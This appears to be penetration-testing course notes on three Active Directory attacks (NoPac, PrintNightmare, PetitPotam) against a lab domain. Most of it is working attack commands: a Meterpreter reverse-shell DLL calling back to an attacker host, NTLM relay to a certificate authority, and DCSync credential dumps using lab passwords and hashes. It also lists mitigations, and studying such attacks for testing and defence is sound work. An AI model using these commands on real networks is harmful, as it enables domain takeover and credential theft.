Bleeding Edge Vulnerabilities

Three high-impact AD attack vectors that can lead to domain compromise from a standard domain user (or even unauthenticated). Useful when patch management is slow, but carry risk — understand the impact before using in production environments.

NoPac (SamAccountName Spoofing)

CVEs: CVE-2021-42278 + CVE-2021-42287

Allows intra-domain privilege escalation from any standard domain user to Domain Admin via a single command.

How It Works

Authenticated users can add up to 10 computer accounts to a domain (controlled by ms-DS-MachineAccountQuota)
Create a new machine account and rename its SamAccountName to match a Domain Controller’s name
Request a Kerberos TGT — the KDC issues a ticket under the DC’s name
Request a TGS — the service issues a ticket for the closest matching name (the real DC)
Result: SYSTEM shell on the Domain Controller

If ms-DS-MachineAccountQuota is set to 0, this attack fails.

Scanning

sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap

Check the ms-DS-MachineAccountQuota value and whether a TGT can be obtained.

Getting a Shell

sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap

Uses smbexec.py under the hood — may be blocked by AV/EDR. Use exact paths instead of cd in the semi-interactive shell.

DCSync via NoPac

sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user INLANEFREIGHT/administrator

The TGT is saved as a .ccache file that can be used for pass-the-ticket attacks.

Windows Defender Considerations

smbexec.py creates services (BTOBTO, BTOBO) and batch files (execute.bat) that Defender flags as VirTool:Win32/MSPSEexecCommand. Commands may fail even though the shell session establishes.

PrintNightmare

CVEs: CVE-2021-34527 + CVE-2021-1675

Remote code execution via the Print Spooler service. Runs on all Windows OS versions.

Prerequisites

cube0x0’s version of Impacket (different from standard Impacket)
Print System Asynchronous Protocol (MS-PAR) and Print System Remote Protocol (MS-RPRN) exposed on target

Enumerate Print Spooler Exposure

rpcdump.py @172.16.5.5 | egrep 'MS-RPRN|MS-PAR'

Attack Flow

1. Generate DLL payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.225 LPORT=8080 -f dll > backupscript.dll

sudo smbserver.py -smb2support CompData /path/to/backupscript.dll

3. Start Metasploit handler

msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 172.16.5.225
set LPORT 8080
run

4. Run the exploit

sudo python3 CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@172.16.5.5 '\\172.16.5.225\CompData\backupscript.dll'

Result: Meterpreter session as NT AUTHORITY\SYSTEM on the Domain Controller.

Warning: This attack could crash the Print Spooler service and cause a service disruption.

PetitPotam (MS-EFSRPC)

CVE: CVE-2021-36942

LSA spoofing vulnerability that coerces a Domain Controller to authenticate to an attacker-controlled host via NTLM. Combined with AD CS (Active Directory Certificate Services) NTLM relay, this achieves domain compromise from an unauthenticated position.

Attack Flow

ntlmrelayx.py relays the DC’s authentication to the CA’s Web Enrollment page
PetitPotam.py coerces the DC to authenticate to the attacker
A certificate is obtained for the DC’s machine account
The certificate is used to request a TGT via PKINIT
The TGT is used for DCSync

Step 1: Start NTLM relay targeting AD CS

sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController

Step 2: Coerce DC authentication

python3 PetitPotam.py 172.16.5.225 172.16.5.5

Alternative triggers: Mimikatz (misc::efs /server:<DC> /connect:<ATTACK_HOST>), Invoke-PetitPotam.ps1, or an executable version.

Step 3: Request TGT using the certificate

python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 MIIStQI...SNIP...CKBdGmY= dc01.ccache

Save the AS-REP encryption key from the output — needed for the alternate path.

Step 4: DCSync with the TGT

export KRB5CCNAME=dc01.ccache
secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL

Alternate Path: Get NT Hash via U2U

python3 /opt/PKINITtools/getnthash.py -key 70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275 INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$

Then DCSync with the recovered hash:

secretsdump.py -just-dc-user INLANEFREIGHT/administrator "ACADEMY-EA-DC01$"@172.16.5.5 -hashes aad3c435b514a4eeaad3b935b51304fe:313b6f423cd1ee07e91315b4919fb4ba

Windows Path: Rubeus Pass-the-Ticket

Use the base64 certificate from ntlmrelayx.py with Rubeus:

.\Rubeus.exe asktgt /user:ACADEMY-EA-DC01$ /certificate:MIIStQI...SNIP.../ptt

Then DCSync with Mimikatz:

mimikatz # lsadump::dcsync /user:inlanefreight\krbtgt

PetitPotam Mitigations

Control	Details
Patch CVE-2021-36942	Apply to all affected hosts (not sufficient alone if AD CS is present)
Extended Protection for Authentication	Enable on CA Web Enrollment with Require SSL
Disable NTLM on DCs	Prevents NTLM relay entirely
Disable NTLM on AD CS servers	Via Group Policy
Disable NTLM for IIS on AD CS	On servers running Web Enrollment / Certificate Enrollment Web Service

Important: Patching alone is not enough. Authenticated attacks against AD CS are still possible with standard domain user credentials. See the “Certified Pre-Owned” whitepaper for comprehensive AD CS hardening.

Summary Comparison

Attack	Auth Required	Access Level	Risk
NoPac	Standard domain user	SYSTEM on DC	Moderate (creates machine account)
PrintNightmare	Standard domain user	SYSTEM on DC	Higher (may crash Print Spooler)
PetitPotam	None (unauthenticated)	SYSTEM on DC (via AD CS relay)	Moderate (requires AD CS)

Keyboard shortcuts

notebook